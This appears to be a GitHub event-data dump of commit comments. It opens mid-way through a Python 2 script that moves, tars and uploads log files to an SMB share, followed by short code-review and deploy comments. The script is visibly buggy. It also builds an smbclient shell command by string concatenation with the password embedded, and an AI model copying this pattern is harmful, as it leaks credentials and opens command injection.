sub3 in sub_dir3:\r\n                            if os.path.isfile(join(path, sub1, sub2, sub3)):\r\n                                staging_datadir = check_date(join(path, sub1, sub2, sub3), 1)   \r\n                                if staging_datadir == False:\r\n                                    staging_datadir = \"\"\r\n                                else:\r\n                                    str1=''\r\n                                    for ptx in [staging_datadir,sub1,sub2]:\r\n                                        str2=join(str1,ptx)\r\n                                        try:\r\n                                            os.stat(join(staging_path, str2))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, str2))\r\n                                        str1=str2 \r\n                                    str1=''\r\n                                    for ptx in [staging_datadir,path,sub1,sub2]:\r\n                                        str2=join(str1,ptx)\r\n                                        try:\r\n                                            os.stat(join(staging_path, str2))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, str2))\r\n                                        str1=str2                             \r\n                                    cnt += 1  \r\n                                    total_size += os.path.getsize(join(path, sub1, sub2, sub3))\r\n                                    log_file_list.append(join(path, sub1, sub2, sub3))                                         \r\n                                shutil.move(join(path, sub1, sub2, sub3), join(staging_path, staging_datadir, path, sub1, sub2, sub3))            \r\n            else:\r\n                for sub1 in sub_dir1:\r\n                    if os.path.isdir(join(path, sub1)):     \r\n                        sub_dir2 = os.listdir(join(path, sub1))\r\n                        for sub2 in sub_dir2:\r\n                            if os.path.isdir(join(path, sub1, sub2)): \r\n                                sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                for sub3 in sub_dir3:\r\n                                    if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                        sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                        for sub4 in sub_dir4:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                                                  \r\n                                                f4 += 1\r\n                if f4 == 0:\r\n                    for sub3 in sub_dir3:\r\n                        if os.path.isfile(join(path, sub1, sub2, sub3)):                    \r\n                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                            for sub4 in sub_dir4:\r\n                                if os.path.isfile(join(path, sub1, sub2, sub3, sub4)):\r\n                                    staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4), 1)   \r\n                                    if staging_datadir == False:\r\n                                        staging_datadir = \"\"\r\n                                    else:\r\n                                        str1=''\r\n                                        for ptx in [staging_datadir,sub1,sub2,sub3]:\r\n                                            str2=join(str1,ptx)\r\n                                            try:\r\n                                                os.stat(join(staging_path, str2))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, str2))\r\n                                            str1=str2\r\n                                        str1=''\r\n                                        for ptx in [staging_datadir,path,sub1,sub2,sub3]:\r\n                                            str2=join(str1,ptx)\r\n                                            try:\r\n                                                os.stat(join(staging_path, str2))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, str2))\r\n                                            str1=str2\r\n                                                                     \r\n                                        cnt += 1  \r\n                                        total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4))\r\n                                        log_file_list.append(join(path, sub1, sub2, sub3, sub4))                                                     \r\n                                    shutil.move(join(path, sub1, sub1, sub2, sub3, sub4), join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4))                                            \r\n                else:\r\n                    for sub1 in sub_dir1:\r\n                        if os.path.isdir(join(path, sub1)):     \r\n                            sub_dir2 = os.listdir(join(path, sub1))\r\n                            for sub2 in sub_dir2:\r\n                                if os.path.isdir(join(path, sub1, sub2)): \r\n                                    sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                    for sub3 in sub_dir3:\r\n                                        if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                            for sub4 in sub_dir4:\r\n                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                    sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                    for sub5 in sub_dir5:\r\n                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                                                         \r\n                                                            f5 += 1\r\n                    if f5 == 0:\r\n                        for sub4 in sub_dir4:\r\n                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                    \r\n                                sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                for sub5 in sub_dir5:\r\n                                    if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5)):\r\n                                        staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5), 1)   \r\n                                        if staging_datadir == False:\r\n                                            staging_datadir = \"\"\r\n                                        else:\r\n                                            str1=''\r\n                                            for ptx in [staging_datadir,sub1,sub2,sub3, sub4]:\r\n                                                str2=join(str1,ptx)\r\n                                                try:\r\n                                                    os.stat(join(staging_path, str2))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, str2))\r\n                                                str1=str2\r\n                                            str1=''\r\n                                            for ptx in [staging_datadir,path,sub1,sub2,sub3, sub4]:\r\n                                                str2=join(str1,ptx)\r\n                                                try:\r\n                                                    os.stat(join(staging_path, str2))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, str2))\r\n                                                str1=str2                        \r\n                                            cnt += 1     \r\n                                            total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                            log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5))                                                                 \r\n                                        shutil.move(join(path, sub1, sub2, sub3, sub4, sub5), join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4, sub5))                        \r\n                    else:\r\n                        for sub1 in sub_dir1:\r\n                            if os.path.isdir(join(path, sub1)):     \r\n                                sub_dir2 = os.listdir(join(path, sub1))\r\n                                for sub2 in sub_dir2:\r\n                                    if os.path.isdir(join(path, sub1, sub2)): \r\n                                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                        for sub3 in sub_dir3:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                for sub4 in sub_dir4:\r\n                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                        sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                        for sub5 in sub_dir5:\r\n                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                for sub6 in sub_dir6:\r\n                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):                                                                   \r\n                                                                        f6 += 1\r\n                        if f6 == 0:\r\n                            for sub5 in sub_dir5:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                    \r\n                                    sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                    for sub6 in sub_dir6:\r\n                                        if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):\r\n                                            staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6), 1)   \r\n                                            if staging_datadir == False:\r\n                                                staging_datadir = \"\"\r\n                                            else:\r\n                                                str1=''\r\n                                                for ptx in [staging_datadir,sub1,sub2,sub3, sub4, sub5]:\r\n                                                    str2=join(str1,ptx)\r\n                                                    try:\r\n                                                        os.stat(join(staging_path, str2))\r\n                                                    except:\r\n                                                        os.mkdir(join(staging_path, str2))\r\n                                                    str1=str2\r\n                                                str1=''\r\n                                                for ptx in [staging_datadir,path,sub1,sub2,sub3, sub4,sub5]:\r\n                                                    str2=join(str1,ptx)\r\n                                                    try:\r\n                                                        os.stat(join(staging_path, str2))\r\n                                                    except:\r\n                                                        os.mkdir(join(staging_path, str2))\r\n                                                    str1=str2                                        \r\n                                                cnt += 1   \r\n                                                total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6))                                                                             \r\n                                            shutil.move(join(path, sub1, sub2, sub3, sub4, sub5, sub6), join(staging_path, staging_datadir, sub1, sub2, sub3, sub4, sub5, sub6))   \r\n\r\n                        else:\r\n                            for sub1 in sub_dir1:\r\n                                if os.path.isdir(join(path, sub1)):     \r\n                                    sub_dir2 = os.listdir(join(path, sub1))\r\n                                    for sub2 in sub_dir2:\r\n                                        if os.path.isdir(join(path, sub1, sub2)): \r\n                                            sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                            for sub3 in sub_dir3:\r\n                                                if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                    sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                    for sub4 in sub_dir4:\r\n                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                            sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                            for sub5 in sub_dir5:\r\n                                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                    sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                    for sub6 in sub_dir6:\r\n                                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):       \r\n                                                                            sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                                            for sub7 in sub_dir7:\r\n                                                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):                                                                                   \r\n                                                                                    f7 += 1\r\n                            if f7 == 0:\r\n                                for sub6 in sub_dir6:\r\n                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):                    \r\n                                        sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                        for sub7 in sub_dir7:\r\n                                            if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):\r\n                                                staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7), 1)   \r\n                                                if staging_datadir == False:\r\n                                                    staging_datadir = \"\"\r\n                                                else:\r\n                                                    str1=''\r\n                                                    for ptx in [staging_datadir,sub1,sub2,sub3, sub4,sub5,sub6]:\r\n                                                        str2=join(str1,ptx)\r\n                                                        try:\r\n                                                            os.stat(join(staging_path, str2))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, str2))\r\n                                                        str1=str2\r\n                                                    str1=''\r\n                                                    for ptx in [staging_datadir,path,sub1,sub2,sub3, sub4,sub5,sub6]:\r\n                                                        str2=join(str1,ptx)\r\n                                                        try:\r\n                                                            os.stat(join(staging_path, str2))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, str2))\r\n                                                        str1=str2                                        \r\n                                                    cnt += 1   \r\n                                                    total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                    log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))                                                                             \r\n                                                shutil.move(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7), join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))   \r\n                                \r\n                            else:\r\n                                for sub1 in sub_dir1:\r\n                                    if os.path.isdir(join(path, sub1)):     \r\n                                        sub_dir2 = os.listdir(join(path, sub1))\r\n                                        for sub2 in sub_dir2:\r\n                                            if os.path.isdir(join(path, sub1, sub2)): \r\n                                                sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                                for sub3 in sub_dir3:\r\n                                                    if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                        sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                        for sub4 in sub_dir4:\r\n                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                                sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                                for sub5 in sub_dir5:\r\n                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                        sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                        for sub6 in sub_dir6:\r\n                                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):       \r\n                                                                                sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                                                for sub7 in sub_dir7:\r\n                                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):   \r\n                                                                                        sub_dir8 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                                                        for sub8 in sub_dir8:\r\n                                                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8)):                                                                                           \r\n                                                                                                f8 += 1\r\n                                if f8 == 0:\r\n                                    for sub7 in sub_dir7:\r\n                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):                    \r\n                                            sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                            for sub8 in sub_dir8:                                                \r\n                                                if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8)):\r\n                                                    staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8), 1)   \r\n                                                    if staging_datadir == False:\r\n                                                        staging_datadir = \"\"\r\n                                                    else:\r\n                                                        try:\r\n                                                            os.stat(join(staging_path, staging_datadir, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, staging_datadir, sub1, sub2, sub3, sub4, sub5, sub6, sub7))                                                                           \r\n                                                        try:\r\n                                                            os.stat(join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))                \r\n                                                        cnt += 1   \r\n                                                        total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8))\r\n                                                        log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8))                                                                             \r\n                                                    shutil.move(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8), join(staging_path, staging_datadir, path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8))                                  \r\n\r\ndef get_Archiving(archiving_path):\r\n    total_size = 0\r\n    files = os.listdir(archiving_path)\r\n    if len(files) > 0:\r\n        for i in files:\r\n            total_size += os.path.getsize(join(archiving_path, i))\r\n    print (\"Counts : \" + str(len(files)))\r\n    print (\"Size   : \" + str(total_size))\r\n    return len(files), total_size    \r\n    \r\n\r\ndef prepare_compression(staging_path, archiving_path):\r\n    \"\"\" function to compress as Gzip file and  move into Archiving directory \"\"\"\r\n\r\n    print \"Compressing gzip files and move into Archiving directory...\"\r\n    \r\n    # Get the counts and size of files of Archiving that before compression.\r\n    print \"Current files of Archiving\" \r\n    before_counts, before_size = get_Archiving(archiving_path)\r\n    \r\n    # Get all files of Staging directory\r\n    files = os.listdir(staging_path)\r\n    global cnt\r\n    global total_size\r\n    global log_file_list\r\n    log_file_list = []\r\n    for f in files:\r\n        if isfile(join(staging_path, f)):\r\n            continue\r\n\r\n        if not validate_file(f):\r\n            continue\r\n\r\n        # Remove directory from Staging\r\n        if not check_date(join(staging_path, f), 2):\r\n            continue\r\n\r\n        # Compress as Gzip file and move to Archiving directory\r\n        \r\n        gzpath = join(archiving_path, f) + '.tar.gz'\r\n        f_out = tarfile.open(gzpath, 'w:gz')\r\n        f_out.add(join(staging_path, f), arcname = f)\r\n        f_out.close()\r\n        total_size += os.path.getsize(gzpath)\r\n        fl1=f+'.tar.gz'\r\n        log_file_list.append(fl1)\r\n        lk1='Archiving/'+fl1#os.path.join()\r\n        \r\n        \r\n        cmd='//'+SERVER_IP+'/'+SHARE+' -U '+USERNAME+'%'+PASSWORD+' -c \\'put \"'+lk1+'\" '+fl1+'\\''\r\n        \r\n        \r\n        (stdout, stdin) = popen2.popen2('smbclient '+cmd)\r\n        stdin.write(PASSWORD)\r\n        \r\n        \r\n    # Get the counts and size of files of Archiving that after compression.\r\n    print \"Check the compressed state\"\r\n    after_counts, after_size = get_Archiving(archiving_path)    \r\n    \r\n    if after_counts > before_counts and after_size > before_size:\r\n        shutil.rmtree(join(staging_path, f))\r\n\r\n\r\n\r\ndef logging_file(flag):\r\n    \"\"\" Function to save logging information \"\"\"\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list    \r\n    global is_new\r\n\r\n    # Logging filename\r\n    log_filename = \"history.log\"\r\n\r\n    # Open log file\r\n    try:\r\n        f = open(log_filename, 'a')\r\n    except IOError:\r\n        os.stat(log_filename)\r\n\r\n    # Write head info\r\n    if is_new == True:                \r\n        f.write(unicode('\\n--------------- ' + str(datetime.now().date()) + ' ' + str(datetime.now().strftime(\"%H:%M:%S\")) + ' ---------------\\n'))        \r\n        is_new = False\r\n\r\n    if flag == 1:\r\n        ln1=str(cnt) + ' files (' + str(total_size/1000000.0) +' MB) are moved from Data to Staging directory: '        \r\n        f.write( unicode(ln1))\r\n\r\n    else:\r\n        ln1=str(total_size/1000000.0) +' MB and moved from Staging to Archiving directory: '\r\n        f.write(unicode(ln1))\r\n    f.write(unicode(''))\r\n\r\n    # Write archiving data filename\r\n    f.write(unicode(''))\r\n    for log_file in log_file_list:\r\n        ln1='\\t' + str(log_file)\r\n        f.write(unicode(ln1))\r\n\r\n    f.write(unicode(''))\r\n\r\n    logging.shutdown()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    global smbConnFile\r\n    global USERNAME\r\n    global PASSWORD\r\n    global SERVER_IP\r\n    global SERVER_NAME\r\n    global PORT\r\n    global SHARE\r\n    inifile=open(smbConnFile, 'r')\r\n    try:\r\n        for i, line in enumerate(inifile):\r\n            ar1=re.split('\\s{1,}=\\s{1,}(.*?)\\n$',line)\r\n            \r\n            if ar1[0] == 'username':\r\n                if len(ar1)>1: \r\n                    USERNAME=ar1[1]                \r\n            elif ar1[0] == 'password':\r\n                if len(ar1)>1: \r\n                    PASSWORD=ar1[1]\r\n            elif ar1[0] == 'server_ip':\r\n                if len(ar1)>1: \r\n                    SERVER_IP=ar1[1]\r\n            elif ar1[0] == 'SERVER_NAME':\r\n                if len(ar1)>1: \r\n                    SERVER_IP=ar1[1]\r\n            elif ar1[0] == 'port':\r\n                if len(ar1)>1: \r\n                    PORT=ar1[1]\r\n            elif ar1[0] == 'share':\r\n                if len(ar1)>1: \r\n                    SHARE=ar1[1]\r\n    finally:\r\n        if inifile is not None:\r\n            inifile.close()\r\n    staging_path = \"Staging\"\r\n    archiving_path = \"Archiving\"\r\n\r\n    cnt = 0\r\n    total_size = 0\r\n    log_file_list = []\r\n\r\n    # Get all data directories\r\n    data_path_list = [\"Data\", \"ftp\", \"mriFeeds\",\"output\"]\r\n    for data_path in data_path_list:\r\n        # Move files from data to staging directory\r\n        move_staging(data_path, staging_path)\r\n\r\n    # Logging for Staging state\r\n    if cnt > 0:\r\n        \r\n        \r\n        logging_file(1)\r\n\r\n    # Compress and move gzip files from staging to archiving\r\n    prepare_compression(staging_path, archiving_path)\r\n\r\n    # Logging for Archiving state\r\n    if cnt > 0:\r\n        \r\n      logging_file(2)\r\n\r\n    print \"\\nComplete successfully!\""}},"created_at":"2018-07-16T10:18:57Z"}
{"id":"7969792913","type":"CommitCommentEvent","actor":{"login":"malcolm-gc"},"repo":{"name":"malcolm-gc/template_for_jar-"},"payload":{"comment":{"id":29718294,"position":null,"line":null,"path":null,"commit_id":"4c4fc35cf61a87d5f2efcd59dc04c2cb92efbae0","created_at":"2018-07-16T10:19:34Z","updated_at":"2018-07-16T10:19:34Z","author_association":"OWNER","body":"First goes are always painful"}},"created_at":"2018-07-16T10:19:34Z"}
{"id":"7969792941","type":"CommitCommentEvent","actor":{"login":"Darr-en1"},"repo":{"name":"Darr-en1/note"},"payload":{"comment":{"id":29718295,"position":null,"line":null,"path":null,"commit_id":"ac2bbadddeee9f521009086adc225e23e8bc6434","created_at":"2018-07-16T10:19:34Z","updated_at":"2018-07-16T10:19:34Z","author_association":"OWNER","body":"sddasdasdasd"}},"created_at":"2018-07-16T10:19:34Z"}
{"id":"7969793158","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718296,"position":91,"line":91,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:19:37Z","updated_at":"2018-07-16T10:19:37Z","author_association":"COLLABORATOR","body":"`update_revenue` and `calc_revenue_by_month` are basically the same method"}},"created_at":"2018-07-16T10:19:37Z"}
{"id":"7969795127","type":"CommitCommentEvent","actor":{"login":"knowing-peo"},"repo":{"name":"knowing-peo/testVue"},"payload":{"comment":{"id":29718300,"position":null,"line":null,"path":null,"commit_id":"112eb8d76f690ca5fe02b5168234e0a96a6bdb24","created_at":"2018-07-16T10:20:05Z","updated_at":"2018-07-16T10:20:05Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-16T10:20:05Z"}
{"id":"7969798638","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718306,"position":14,"line":14,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:20:50Z","updated_at":"2018-07-16T10:20:50Z","author_association":"COLLABORATOR","body":"`-1`?"}},"created_at":"2018-07-16T10:20:50Z"}
{"id":"7969799410","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29718309,"position":null,"line":null,"path":null,"commit_id":"7e361d9724dd1c5c11d5fd037c47a7b6222a0b95","created_at":"2018-07-16T10:21:00Z","updated_at":"2018-07-16T10:21:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-102059 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-102059\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-16T10:21:00Z"}
{"id":"7969803187","type":"CommitCommentEvent","actor":{"login":"Tpt"},"repo":{"name":"ProgVal/rust-xml-schema"},"payload":{"comment":{"id":29718314,"position":39,"line":39,"path":"src/support.rs","commit_id":"2215f48b27e25ecca1e78c0d82d0e928b1a54fc8","created_at":"2018-07-16T10:21:49Z","updated_at":"2018-07-16T10:21:49Z","author_association":"NONE","body":"Beware, for xsd:float and xsd:double NaN == NaN (because of the string equality)."}},"created_at":"2018-07-16T10:21:49Z"}
{"id":"7969807348","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29718325,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T10:22:45Z","updated_at":"2018-07-16T10:22:45Z","author_association":"OWNER","body":">\n> I'm not 100% sure on that: didn't we decide to get rid of the direct morph\n> because it was slower or so and only use pre-compute morphing anyway?\n>\nsorry I had missed this debate. Sure if you test and confirm this fine with\nme.\n\n> So I implemented it such that initializing the SourceMorph causes\n> pre-computation (always, except when src is None (in my case)) and calling\n> an instance applies it. Which would technically mean that - yes -\n> SourceMorph always makes use of the precomputed way (of morphing surface\n> data)\n>\n\nhow about \"src=None\" means surface and don't precompute and if src is a\nsurface source space you precompute ?\n"}},"created_at":"2018-07-16T10:22:45Z"}
{"id":"7969808297","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29718326,"position":37,"line":2335,"path":"mne/source_estimate.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T10:22:59Z","updated_at":"2018-07-16T10:22:59Z","author_association":"NONE","body":"All right, I'll rewrite it like that, but it makes volume morphing more ugly ;)\r\n```\r\nstc_to = SourceMorph(src=src)(stc_from)\r\n```\r\nDoing it like that maybe makes it a bit sleeker internally :)"}},"created_at":"2018-07-16T10:22:59Z"}
{"id":"7969809219","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29718327,"position":null,"line":null,"path":null,"commit_id":"aabebb4167b63447f6f819bef36bd0bac23ba785","created_at":"2018-07-16T10:23:11Z","updated_at":"2018-07-16T10:23:11Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-102310 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180716-102310\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-16T10:23:11Z"}
{"id":"7969809573","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718328,"position":50,"line":50,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:23:16Z","updated_at":"2018-07-16T10:23:16Z","author_association":"COLLABORATOR","body":"you can have stuff like this in a one liner:\r\n`return false if start_date > @end_month || end_date < @start_month`"}},"created_at":"2018-07-16T10:23:16Z"}
{"id":"7969811586","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718332,"position":53,"line":53,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:23:42Z","updated_at":"2018-07-16T10:23:42Z","author_association":"COLLABORATOR","body":"don't need `return` - simply `true` will do"}},"created_at":"2018-07-16T10:23:42Z"}
{"id":"7969812325","type":"CommitCommentEvent","actor":{"login":"Dominika-Appgenix"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29718333,"position":4,"line":236,"path":"summer-of-code/README.md","commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-16T10:23:52Z","updated_at":"2018-07-16T10:23:52Z","author_association":"NONE","body":"Dominika Obacz"}},"created_at":"2018-07-16T10:23:52Z"}
{"id":"7969837344","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718387,"position":31,"line":31,"path":"run.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:29:38Z","updated_at":"2018-07-16T10:29:38Z","author_association":"COLLABORATOR","body":"I would have a Class to represent the CSV file, and each call to `process` takes the year and month, calculates them and puts them in a cache.\r\nSubsequent calls with same year and month return from the cache"}},"created_at":"2018-07-16T10:29:38Z"}
{"id":"7969839968","type":"CommitCommentEvent","actor":{"login":"diviner0359"},"repo":{"name":"diviner0359/tata"},"payload":{"comment":{"id":29718394,"position":null,"line":null,"path":null,"commit_id":"13d79e630661f70c668b66ee31e13474c8979d85","created_at":"2018-07-16T10:30:16Z","updated_at":"2018-07-16T10:30:16Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-16T10:30:16Z"}
{"id":"7969841564","type":"CommitCommentEvent","actor":{"login":"a3246995"},"repo":{"name":"hashemirafsan/vue-google-maps"},"payload":{"comment":{"id":29718398,"position":null,"line":null,"path":null,"commit_id":"c64b77b3a0ca5de2d0cdf1a30bcd0485a6e8c13c","created_at":"2018-07-16T10:30:38Z","updated_at":"2018-07-16T10:30:38Z","author_association":"NONE","body":"请问,Marker自定义图片标记,它的大小怎么控制????我现在无法控制我的图片大小,这是图片链接:https://app.kmilesaway.com/res/S/1420/953d450952fc49d79e0fa1e74fc4be99,还有中国谷歌API没发用我需要用这个链接,请问怎么设置?http://maps.google.cn/maps/api/js?region=cn&language=zh-CN&key=....."}},"created_at":"2018-07-16T10:30:38Z"}
